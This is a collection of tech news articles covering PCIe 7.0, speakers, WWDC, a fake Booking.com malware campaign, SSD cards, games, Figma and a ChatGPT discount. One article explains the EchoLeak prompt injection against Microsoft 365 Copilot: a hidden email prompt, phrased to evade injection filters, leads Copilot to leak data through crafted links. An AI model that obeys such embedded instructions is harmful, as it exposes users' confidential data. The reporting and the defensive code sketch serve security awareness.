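// Rough back-of-the-envelope for PCIe 7.0's headline figures
// (FLIT encoding and protocol overhead are ignored, so treat these as ceilings).
const transferRateGTs = 128;   // 128 GT/s per lane, per direction
const lanes = 16;              // a full x16 slot

// One transfer carries roughly one bit, so 128 GT/s ≈ 128 Gb/s ≈ 16 GB/s per lane.
const gbPerLanePerDirection = transferRateGTs / 8;       // ~16 GB/s
const gbPerDirection = gbPerLanePerDirection * lanes;    // ~256 GB/s
const gbBothDirections = gbPerDirection * 2;             // ~512 GB/s, matching the quoted total

console.log({ gbPerLanePerDirection, gbPerDirection, gbBothDirections });
```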

So, while much faster speeds for that communication are indeed a potentially big deal – mainly for the performance of GPUs and drives – we are very much looking to the future here, meaning way down the line.

Analysis: Timescales – and PCIe 8.0 appearing on the horizon


As I already mentioned, we are on PCIe 5.0 right now. PCIe 6.0 was announced at the start of 2022, over three years ago, and still remains in development, though it is now nearing the finish line – we may even see the first hardware supporting it arrive later this year (or early next).

So, as you can imagine, we’re looking towards the end of the decade before PCIe 7.0 actually pitches up. Leading up to that milestone, hardware makers will be working away with the standard, developing and testing prototypes, and refining the final hardware for three or four years. And initially, that hardware will be used in the likes of quantum computing, data centers and other demanding tasks – not consumer PCs.

And meanwhile, PCI-SIG has confirmed that work on concocting the PCIe 8.0 standard has already begun.

So, while this is all well and good, with these incoming standards lining up and sounding ever more blisteringly fast, what’s the impact for consumers in the nearer-term? Not a lot, frankly. Even the top-tier, super-expensive examples of the best GPUs currently available aren’t pushing the boundaries of PCIe 5.0 yet – there’s no need for anything faster, not even in the flashiest PC.

However, there are niche cases where older PCIe standards are now hampering some new graphics cards.

A case in point is the RTX 5060 Ti (or non-Ti) with 8GB of video RAM, which loses some performance when it’s in a PCIe 4.0 motherboard slot because that slower standard isn’t enough – and if your motherboard’s still using PCIe 3.0, that’s a world of performance pain. (For a detailed explanation of why this GPU is problematic in this way, check here – AMD’s RX 9060 XT is also held back by its 8GB of VRAM).

Really, though, this is outlier stuff more than anything (and frankly, more to do with questionable decision-making and configuration of these graphics cards in the first place). Still, with ever-faster PCIe standards rolling inexorably towards us, in the future, even aging consumer PCs might cope better with whatever dubious decisions GPU makers throw at them.

Furthermore, as recently discussed, advancing the PCIe spec and keeping it very much on the cutting-edge is important in terms of maintaining standardization for the connection of PC components.

Categories: Technology

Edifier’s new retro-style wireless speaker range looks very cool, and has the features to take on JBL and Sonos

Thu, 06/12/2025 - 14:00
  • Edifier reveals 3 speakers, from tabletop to super-portable
  • 6W, 34W and 60W speaker models
  • New ANC headphones with 92-hour battery life

I'm a big fan of modern tech in retro clothes: give me a hi-res audio player that looks like an old AM radio and you can take my money. And I'm also a fan of corporate PR nonsense. So the launch of the new Edifier ES Series of speakers and headphones has put me in my happy place.

Corporate PR nonsense first: The letters ES carry "layered meaning", because the E means "Elegant", the S stands for "Superb (or Luxurious)", and if you put those two letters together they stand for "Edifier Sound".

Nonsense aside, I love the look of the speakers: there are three models of increasing elongation, beginning with the super-cute square of the ES20, stretching into the rectangular ES60 and then the bigger box of the ES300. And the specs are impressive for all three.

It's not just speakers: there are new 92-hour ANC headphones too.

Edifier ES20, ES60, and ES300: key features and pricing

The flagship here is the ES300, a 60W, handcrafted wooden speaker with leather-look accents, a braided grille and a metallic control panel. Behind the grille there's a 4-inch long-throw mid/bass driver and dual 1.25-inch silk dome tweeters.

The ES300 has hi-res audio up to 24-bit/96kHz, and it has dual-band WiFi and AirPlay 2. Wired ports are USB-A and Aux, and there's a built-in ambient light system with three effects and two colors.

The ES300 is $399.99 in the US, £299.99 in the UK* and AU$399 in Australia.

The portable ES60 is smaller but still punchy, with 34W of power through its dual 22mm tweeters, oval mid/bass driver with neodymium magnets and passive bass radiator. It has Bluetooth 5.4 with multipoint and stereo pairing, USB-C for audio input and charging, and promises 9 hours of playback. Like its bigger sibling it too has ambient lighting built-in.

The ES60 is $199.99 / £119.99 / AU$199.00.

Last but not least there's the teeny ES20, a 6W portable Bluetooth speaker with a 43mm full-range driver with a neodymium magnet, a 55mm passive bass radiator and a Class D amp. It's IP67 rated, has Bluetooth 5.4 and includes a high-sensitivity microphone for calling; once again there's built-in ambient lighting.

The ES20 is $89.99 / £49.99 / AU$99.

Edifier has also launched a set of headphones, the ES850NB. They're wireless over-ears with wired and wireless Hi-Res Audio certification, 40mm dynamic drivers and support for LDAC as well as the usual AAC and SBC. There's active noise cancellation, AI call clarity, and up to 92 hours of battery life.

The ES850NB headphones are $169.99 / £119.99 / AU$179.

All four models from the Edifier ES Series are available now.

* US prices are from Edifier's press release; UK and Australian prices are from retailers' websites.

Categories: Technology

Live from WWDC 2025 – TechRadar podcast unpacks that massive iPadOS update and looks through Liquid Glass

Thu, 06/12/2025 - 13:54

It’s been a hectic week for Apple with an entirely new look dubbed Liquid Glass arriving for all its platforms, true multitasking on the iPad, some Apple Intelligence changes, a new naming scheme, and a workout buddy for the Apple Watch, among so much else. We’ve been breaking it all down at TechRadar, and you can find a nice roundup of the 15 things we learned at WWDC 2025 here.

But, in true TechRadar fashion, shortly after the nearly two-hour keynote, we sat down with two special guests in an ultra-sleek podcast studio inside the ring at Apple Park for a special edition of the TechRadar Podcast.

Tom’s Guide Managing Editor for Video and TikTok star Kate Kozuch, KTLA Tech Reporter and @RichOnTech radio host Rich DeMuro, and TechRadar’s Editor At Large Lance Ulanoff joined me for a wide-ranging discussion on nearly everything that Apple announced.


If you’re curious about Liquid Glass – Apple’s new look for iOS, iPadOS, macOS, watchOS, and tvOS – you won’t have to wait long as we kick off our discussion there. We also quickly dive into the significant changes arriving with iPadOS 26, the super-charged Spotlight within macOS 26, and the shorter section of the keynote around Apple Intelligence and the update on Siri.

We even discuss what the significant changes on iPad – the arrival of multitasking, a dock, proper file support, and a menu bar – could mean for the future of the Mac. Does this mean a MacBook with a touchscreen is on the horizon, or is the iPad a true laptop replacement for anyone now?

And if you had thoughts about Apple’s updated naming schemes for its platforms – they’re all lined up to 26 now – we provide analysis on that and even some speculation on what this could mean for future hardware from Apple.

You can watch the video version of our special edition podcast below, or listen to the audio version on Apple Podcasts or Spotify. While you’re there, or on YouTube, why not follow us to stay up-to-date with everything happening in tech?

Categories: Technology

Holidaymakers under threat from devious new cyber threat - here's how to stay safe

Thu, 06/12/2025 - 13:32
  • Experts warn of fake Booking.com sites circulating on the web
  • The sites come with a fake "Accept Cookie" prompt that downloads a RAT
  • Shoppers should be on their guard when searching for deals

Hackers have been found targeting holidaymakers around the world with remote access trojans (RAT) distributed through fake Booking.com websites, experts have warned.

Researchers from HP Wolf Security found cybercriminals have been making websites that, at first glance, look just like booking.com - they carry the same branding, the same color scheme, and the same formatting. However, the content of the website is blurred, and a deceptive cookie banner is displayed over it.

If victims press “Accept cookies”, they’ll trigger a download of a malicious JavaScript file. This, in turn, installs XWorm, a powerful RAT that grants the attackers full control over the compromised device, including access to files, webcams, and microphone. They can also use the access to disable security tools, deploy additional malware, and exfiltrate passwords and other data.

Peak booking period

HP Wolf Security says it first spotted the campaign in Q1 2025, which is “peak summer holiday booking period” and a time when “click fatigue” sets in, as prospective holidaymakers get reckless and don’t pay attention to the sites they’re visiting, which can end in disaster.

"Since the introduction of privacy regulations such as GDPR, cookie prompts have become so normalized that most users have fallen into a habit of ‘click-first, think later,’” commented Patrick Schläpfer, Principal Threat Researcher in the HP Security Lab.

“By mimicking the look and feel of a booking site at a time when holiday-goers are rushing to make travel plans, attackers don’t need advanced techniques - just a well-timed prompt and the user’s instinct to click.”

There are a few things users can do to stay safe, and the first one is to slow down when browsing.

Users should also make sure not to click on links in emails or social media messages, especially for well-established sites such as Booking. Instead, type in the address in the browser’s navigation bar manually.

Categories: Technology

Microsoft makes fun of macOS Tahoe’s Liquid Glass redesign for ripping off Windows Vista – but Apple could have the last laugh

Thu, 06/12/2025 - 12:45
  • Microsoft compared Liquid Glass to Windows Vista on its Instagram account
  • It’s rather late to the party in drawing this kind of comparison
  • Mind you, if anyone has a right to do so, it’s Microsoft, which brought in transparency with the Aero effect on the desktop of Vista

Microsoft has joined the throng of those who’ve been making fun of Apple’s new Liquid Glass interface for macOS Tahoe 26 (and iOS 26 or indeed other platforms such as iPadOS 26).

On its Instagram account yesterday, as flagged up by Windows Latest, Microsoft posted a collection of screenshots of Windows Vista. This arrived complete with nostalgic sound effects (the chime of booting to the desktop) from back in the day (2007), with a single, simple sentence: “Just gonna leave this here.”


In case you missed it, Apple has caught quite a volley of criticism for what’s perceived as making it seem like Liquid Glass has reinvented the idea of transparency – a glassy, see-through interface – when this was actually done by Microsoft in… yes, you guessed it: Windows Vista.

In Windows Vista, this effect was called Aero (and later, Aero also came to Windows 7), and as you can see in the Instagram montage above, it’s all about translucent windows, allowing you to see the background through them.

Microsoft is late to the party here, really, and in that respect, the company looks a tad silly. Everybody’s done their take on how Liquid Glass is Vista (or Windows 7), how Apple are copycats, etcetera – and so Microsoft is running the risk of inducing some yawns here.

But still, Microsoft did invent Aero with these venerable desktop operating systems many translucent moons ago, so in a way, more than anyone, the software giant has a right to poke some fun at macOS Tahoe 26 here.

Analysis: Fun but not fair?


So, given the hail of critical bullets trying to shatter Apple’s Liquid Glass – Microsoft’s latest potshot included – it’s worth considering a key question. Is it really fair to level accusations at the Mac and iDevice maker for being so unoriginal and dated with its UI innovation here?

I don’t think it is. Still, Apple must’ve known it was going to face this kind of backlash, even if it’s a rather tongue-in-cheek affair (mostly). And for Microsoft, it’s an obvious opportunity to take a rival down a peg or two, which, let’s face it, is not to be missed. However, I'm not sure why Microsoft was slow to move with its post.

Whatever the case, one thing is obvious: Liquid Glass does not equal Vista’s Aero effect (and I hardly think Microsoft is suggesting that, of course). Yes, there are clear visual parallels, but what macOS Tahoe 26 is doing is very different from Windows Vista or 7.

For starters, the reason nobody liked Aero much in Windows Vista was because it caused the OS environment to run slower – nobody wanted lag when dragging windows around the desktop, unsurprisingly. (Windows 7 did better here, of course).

Not only is contemporary hardware now ripe for a much better implementation of transparent interface elements – so it’ll all be suitably responsive – but Apple’s Liquid Glass appears to be far more sophisticated in nature. It looks like there’s a lot of careful crafting here, with nuances in the way light passes through the ‘glass’ and interacts with the interface behind it.

Granted, it’s still too early to say exactly how this will pan out, but Aero it ain’t, that’s for sure. I’ve been told by others on the TechRadar team who’ve seen the interface in action that it looks much better in real-world use than screenshots can convey.

Even so, worries remain, without a doubt. The most obvious potential thorn is diminished accessibility, and the lack of clarity that these fancy, see-through effects might cause. What we don’t want is a muddied look where the user struggles to read basic text or make out icons in the foreground.

Time will tell regarding those concerns, but Apple appears to have thought this whole plan and overarching philosophy through quite fully, given that this is not a mere interface revamp, but a wholesale cross-platform unification for macOS, iOS, and all the rest of the company’s operating systems.

Thus far, Liquid Glass looks pretty slick, it looks like function is as important as form, and yes, it looks like Windows Vista a bit, too. But hey, what did you expect Apple to do with all eyes on its big WWDC 25 interface reveal? Acknowledge Microsoft as the forerunner of glassy transparency in the realm of desktop operating systems?

Categories: Technology

This GPU-like internal card combines 28 M.2 SSDs to offer up to 109GB/s read speed and 224TB storage - but I struggle to see any real use for it

Thu, 06/12/2025 - 12:32
  • Utran’s PCIe 5.0 card holds 28 M.2 SSDs, reaching a total 224TB capacity
  • Delivers 109GB/s read speed using Broadcom switch and advanced cooling
  • Ideal for AI workloads, but overkill for most enterprise storage needs

Utran Technology has introduced a new PCIe 5.0 add-in card which feels more like a GPU than a storage solution.

Unveiled at Computex 2025, the device can host up to 28 NVMe Gen5 M.2 8TB SSDs in a single slot, delivering 109GB/s sequential read speed and a total storage capacity of 224TB.

Two versions of the 28x M.2 Host Card will be available: the HM-5281A and the HM-5282A. Both use the Broadcom AtlasII PEX89144 switch to handle internal bandwidth and connectivity. The HM-5281A uses a single PCIe Gen5 x16 upstream link, while the HM-5282A doubles that with two x16 links, bringing total bandwidth up to 1024 GT/s.
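
For a sense of scale, here's a rough back-of-the-envelope estimate of what those upstream links can theoretically carry, assuming standard PCIe 5.0 figures (32 GT/s per lane with 128b/130b encoding) and ignoring protocol overheads; the numbers below are illustrative, not vendor specifications.

```python
# Rough PCIe Gen5 bandwidth ceiling, ignoring packet/flow-control overheads.
# Assumes standard PCIe 5.0 figures: 32 GT/s per lane, 128b/130b encoding.

GT_PER_LANE = 32                 # giga-transfers per second per lane (PCIe 5.0)
ENCODING_EFFICIENCY = 128 / 130  # usable fraction after line encoding
LANES_PER_LINK = 16

usable_gbps_per_lane = GT_PER_LANE * ENCODING_EFFICIENCY      # ~31.5 Gb/s
gbytes_per_link = usable_gbps_per_lane * LANES_PER_LINK / 8   # ~63 GB/s per x16

print(f"Single x16 link (HM-5281A): ~{gbytes_per_link:.0f} GB/s ceiling")
print(f"Dual x16 links (HM-5282A):  ~{2 * gbytes_per_link:.0f} GB/s ceiling")

# The quoted 109 GB/s sequential read figure only fits under the dual-link
# card's ~126 GB/s theoretical ceiling, not a single x16 connection.
```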

Surprise hot plug support

Cooling comes via a high-pressure fan and radiator combo. Although it has a dense footprint, the layout is built for rack-scale deployment. In theory, eight cards could deliver nearly 1.8PB of flash inside a single server.

Both models are powered by an EPS 8-pin connector and support surprise hot plug, meaning the system can detect and manage the 28 M.2 drives even if they’re swapped in unexpectedly. This is particularly useful for testing or dynamic environments, though you'd need to take care doing so in real-world deployments, especially as the card itself isn't hot-swappable.

The 28x M.2 Host Card also lacks card-level power loss protection, so you’d need to rely on SSDs that include their own safeguards.

The card does, however, support USB terminal control for firmware updates and system monitoring.

Supported operating systems include Windows, Windows Server, and Linux, making it relatively flexible at the software level.

It's hard to argue with the raw numbers - 109GB/s read speed and sub-millisecond latency are unquestionably impressive - but outside of certain HPC or AI use cases, it's frankly difficult to see a wide audience. Even in dense environments, this level of performance might outpace most storage needs.

Utran says it plans to begin shipping its 28x M.2 Host Card in summer 2025.

Via Tom's Hardware

Categories: Technology

Metal Gear Solid Delta: Snake Eater will have several game modes, but I'm most excited about the newly announced Fox Hunt online multiplayer

Thu, 06/12/2025 - 11:20
  • Metal Gear Solid Delta: Snake Eater is getting an online multiplayer mode called Fox Hunt
  • Fox Hunt is a "completely original online battle mode"
  • Director Yu Sahara said the mode is set in the same world as the main game, but "gameplay is completely different"

Konami has announced that Metal Gear Solid Delta: Snake Eater will have an online multiplayer mode called Fox Hunt.

Revealed during the Konami Press Start livestream today, Fox Hunt is described by the publisher as a "completely original online battle mode" that will play differently from 2008's Metal Gear Online.

Fox Hunt, which is being directed by series veteran Yu Sahara, takes place in the same world as the main game and will offer "hide and seek" mechanics, mixed with stealth and survival elements.

Sahara explained that although the multiplayer shares the same world with the main campaign, "the gameplay is completely different".

"When we say Metal Gear multiplayer, many fans will probably think of Metal Gear Online, but Fox Hunt will be its own new type of mode. We very much appreciate all the long-time fans of MGO who have always wanted to see it make a comeback, but the landscape of multiplayer games has changed a lot since MGO.

"It took a lot of careful consideration to think about what a new online mode should look like. Based on the iconic stealth and survival elements of the Metal Gear series, we are taking camouflage and hide and seek to the next level.

"We challenged ourselves to make something unique that is more than just a shootout. We’ve used that back-and-forth tension of staying hidden or searching out the enemy to create an online experience unique to Metal Gear."

Sahara confirmed that more information about Fox Hunt will be revealed soon.

Alongside Fox Hunt's reveal, Konami also shared a new gameplay trailer for the main game, the PC and PS5-exclusive Ape Escape mode, as well as the first look at the Bomb Snake battle. This Snake vs Bomberman mode is exclusive to Xbox Series X and Xbox Series S.

Secret Theatre is also returning, but this version will task players with locating Secret Theatre videos as collectibles, which are carried by soldiers.

Metal Gear Solid Delta: Snake Eater arrives on August 28 for PS5, Xbox Series X|S, and PC.

Categories: Technology

This iPhone Bluetooth audio issue frustrates me every day, but iOS 26 is finally going to fix it

Thu, 06/12/2025 - 11:18
  • The first iOS 26 developer beta is out now ahead of its public beta launch in July
  • One of its upgrades is a new option called 'Keep Audio in Headphones'
  • This should reduce auto-switching problems for wireless headphones

If you're tired of your iPhone automatically switching audio to every Bluetooth device other than your headphones, then iOS 26 has a treat for you – a new option that keeps audio playing through your wireless headphones.

As spotted by MacRumors, the new iOS 26 developer beta has a long-awaited new option called "Keep Audio in Headphones" in the iPhone's Settings. The new option will seemingly live in the Settings > General > AirPlay & Continuity section and is specifically designed to stop headphones from making unwanted connections to nearby devices.

Apple's description of the feature says "when using AirPods or other connected headphones, keep audio in your headphones when other playback devices like cars and speakers connect to iPhone."

This happens to me all the time, whether it's my audio automatically switching to in-car speakers or to my iPad when it's being used by someone else. Clearly, I'm not alone in finding this annoyance frustrating, so Apple's thankfully including this new option in iOS 26, and it'll hopefully make it to the software's final release in September.

A bit old in the Bluetooth

There are currently workarounds for controlling AirPods auto-switching, but this new iOS 26 option should work across a broad range of Bluetooth devices. (Image credit: Apple / Future)

Bluetooth is now over 25 years old, so in some ways it's miraculous that the short-range wireless tech works as well as it does – yet it's also frequently frustrating.

Without the option of prioritizing the order of your preferred Bluetooth devices, it can often feel like auto-switching has a mind of its own. So this setting, while not exactly one of the biggest iOS 26 features, is definitely a welcome quality-of-life tweak.

Not that it's the only frustrating Bluetooth-related issue we have to grapple with. As our colleagues at What Hi Fi? recently noted, it's high time audio manufacturers started standardizing their Bluetooth pairing processes, too.

Of course, these are very much first-world problems, but at least Bluetooth 6.0 is now rolling out to bring more refinements to the now-ancient tech. These include improved filtering and efficiency, which should bring battery life benefits, along with a feature called Channel Sounding to help improve the accuracy of 'find my device' services from the likes of Apple, Google and Samsung.

Categories: Technology

Microsoft Copilot targeted in first “zero-click” attack on an AI agent - what you need to know

Thu, 06/12/2025 - 11:06
  • Security researchers Aim Labs discovered an LLM Scope Violation flaw in Microsoft 365 Copilot
  • The critical-severity bug allows threat actors to exfiltrate sensitive corporate data by sending an email
  • Microsoft says it has fixed the issue server-side, but users should be on guard

Microsoft has fixed a dangerous zero-click flaw in its Generative Artificial Intelligence (GenAI) assistant, Microsoft 365 Copilot, which could have allowed threat actors to silently exfiltrate sensitive corporate data with almost no user interaction.

Cybersecurity researchers at Aim Labs found the flaw, identified it as an “LLM Scope Violation”, and dubbed it EchoLeak.

Here is how it works: a threat actor sends a seemingly innocuous email message to the target, containing a hidden prompt that instructs Copilot to exfiltrate sensitive data to an attacker-controlled server. Since Copilot is integrated into Microsoft 365, that data can include anything from intellectual property files and business contracts to legal documents, internal communications, and financial data.

Critical vulnerability

The researchers note the prompt needs to be phrased like speaking to a human, so that it bypasses Microsoft’s XPIA (cross-prompt injection attack) defenses.

Later, when the victim interacts with Copilot and asks a business-related question, the LLM will pull in all of the relevant data (including the attacker’s email message) and end up executing the hidden instructions. The stolen data is then smuggled out via a crafted link or image pointing to the attacker’s server.
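
To make that exfiltration channel a little more concrete, here is a minimal, purely illustrative sketch of the kind of output filtering that can blunt it: redacting any link or image in an LLM's response whose destination isn't on a trusted allow-list before the response is rendered. This is not Microsoft's actual mitigation, and the allow-listed domains and helper function below are hypothetical.

```python
import re

# Illustrative sketch only: redact untrusted links in LLM output before it is
# rendered, so a prompt-injected response can't smuggle data out in a crafted
# URL. NOT Microsoft's actual fix; the allow-list and helper are hypothetical.

ALLOWED_DOMAINS = {"sharepoint.com", "office.com"}  # hypothetical allow-list

URL_PATTERN = re.compile(r"https?://([^/\s)]+)(/[^\s)]*)?", re.IGNORECASE)

def strip_untrusted_links(llm_output: str) -> str:
    """Replace any link or image URL whose host isn't on the allow-list."""
    def redact(match: re.Match) -> str:
        host = match.group(1).lower()
        trusted = any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)
        return match.group(0) if trusted else "[link removed]"
    return URL_PATTERN.sub(redact, llm_output)

# Example: an injected response trying to leak data via a query string
print(strip_untrusted_links(
    "Summary ready. ![chart](https://attacker.example/leak?data=secret-figures)"
))
# -> Summary ready. ![chart]([link removed])
```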

The bug was assigned the CVE-2025-32711 identifier, and was given a severity score of 9.3/10 (critical). It was fixed server-side in May, meaning users don’t need to do anything. Microsoft also said that there is no evidence that the flaw had been exploited in the past, and none of its customers were impacted.

Microsoft 365 is one of the most popular cloud-based communications and online collaboration tools, combining office apps (Word, Excel, and others), cloud storage (OneDrive and SharePoint), email and calendar (Outlook, Exchange), and communications tools (Teams).

Recently, Microsoft integrated its Generative AI model, Copilot, into Microsoft 365, allowing users to draft and summarize emails, generate and edit documents, create data visualizations and analyze trends, and more.

Via BleepingComputer

Categories: Technology

Figma unveils big new updates for design and dev - but I'm mostly excited about the rollout of this one tool

Thu, 06/12/2025 - 11:05
  • Figma unveils new AI tools for developers and designers
  • Figma Make finally rolls out to all users with Full Seat
  • Code layers come to Figma Sites

Over the past week, Figma has made good on its many promises revealed at its Config 2025 event.

After announcing the release of four new products - Figma Make, Figma Sites, Figma Buzz, and Figma Draw - the company has now launched a few new updates for developers and designers, alongside the full rollout of its big content ideation tool Figma Make.

According to Figma, these updates are all about “bridging the gap between design and code” with the help of new AI tools. So, what can users expect now?

What’s new in Figma?

For me, the most exciting new release is Figma Make. Finally out of beta, it’s available now to those with a Full Seat.

Figma Make is effectively an overarching design tool that spans the entire platform, and a massive leap for content ideation: users can start with a blank canvas or copy and paste from Figma Designs, collaborate on new ideas, and then bring those designs over to other Figma tools like Sites to refine the concepts.

According to the company, Figma Make is fully capable of helping users create “an agentic AI interface, a business newsletter, and even games.”

When I attended a press briefing at Config London, I was struck by how Yuhki Yamashita, Figma’s Chief Product Officer, repeatedly mentioned how the premise here is being able to quickly conjure up ideas, throw them out if they don’t work, then start anew.

At the time, he said, “Our thought experiment was, how can we make it so easy for you to go from the idea into your head to something that is actually you can put in front of users and validate really quickly. And if it doesn't work, that's great. You can then move on to the next idea, or you can keep iterating from there.”

But it’s not the only big rollout users can now try. Figma has also released a new Dev Mode MCP Server, which is currently in beta.

Eagle-eyed Figma-watchers will have clocked an early demo of this during Microsoft Build’s opening keynote.

The company describes the MCP Server as a way to deliver design context from Figma - think variables and styles, that sort of thing - into a user's preferred LLM, IDE, or agentic coding tool, making sure that AI-generated code aligns with the user's codebase.

And finally, code layers are now rolling out across Figma Sites, the AI-powered website builder. Here, users with pretty much any technical ability can customize websites and build site interactions and animations using AI prompts, presets, or raw code.

I was pretty impressed when I saw Figma Sites in action at Config, where AI prompts were used to transform static text into animated text that reacted to cursor movements. It’s designed in such a way that even a non-designer can easily edit content.

At Config, Yamashita promised bigger things were afoot, saying, “we wanted to make sure that we could support scaled use cases, too. With these kinds of content, it's much easier if we have a CMS, so that a non-designer can come in and comfortably edit that content in a way that's familiar to them. And this is something that's coming soon.” Looks like it’s finally arrived.

You can check out the newest tools by heading to Figma's website and navigating to the Products section.

Categories: Technology

Got ChatGPT Plus? You can now get 3 months for 50% off with this simple trick

Thu, 06/12/2025 - 11:00
  • Get ChatGPT Plus for 3 months at a discounted 50% off rate
  • This easy trick is accessible via ChatGPT's official website
  • ChatGPT Plus gives you access to OpenAI's best models and all the latest features such as Sora

ChatGPT is free to use, but if you want access to OpenAI's latest AI models and tools like the video generation platform Sora, you'll need a ChatGPT Plus account.

Normally, ChatGPT Plus costs $20 a month (£20 / AU$30), but one Reddit user (u/PrettyRevolution1842) has shared an excellent and easy trick to get three months of the service for half price.

With this quick trick, you'll get ChatGPT Plus for $10 a month (£10 / AU$15) for three months, although to get this discounted rate, you'll need to already be subscribed to ChatGPT Plus.

That said, even if you subscribe to ChatGPT Plus at the full price rate for 1 month before following the steps below, you'd still be getting four months of Plus for $50 (£50 / AU$75) instead of $80 (£80 / AU$120).
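
As a quick sanity check on that math, here's a tiny illustrative snippet using the US prices quoted above (the same ratios apply to the £ and AU$ figures):

```python
# Sanity-check the savings using the US prices quoted above.

full_price = 20               # regular ChatGPT Plus monthly price ($)
promo_price = full_price / 2  # 50% off promotional rate ($10)

promo_three_months = 3 * promo_price                       # $30 for existing subscribers
four_months_with_offer = full_price + promo_three_months   # 1 full month + 3 promo = $50
four_months_without = 4 * full_price                       # $80 at the regular rate

print(f"Three promo months: ${promo_three_months:.0f}")
print(f"Four months with the offer: ${four_months_with_offer:.0f} "
      f"(vs ${four_months_without:.0f} without)")
```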

How to get 3 months of ChatGPT Plus for half price
  1. On desktop, go to ChatGPT Settings
  2. Click Manage My Subscriptions
  3. Select Cancel Plan
  4. Accept the 50% off for the next 3 months offer

It's as easy as that: you'll now have a discounted rate on ChatGPT Plus for the next three months. Just remember to cancel auto-renewal so you aren't caught with some hefty fees after the promotional period ends.

ChatGPT Plus offers extended limits on messaging, access to OpenAI's best research and reasoning models like OpenAI o3, OpenAI o4-mini, and OpenAI o4-mini-high, access to new features before free users, and more.

If you're still unsure, read our guide: Is ChatGPT Plus actually worth it?

Categories: Technology
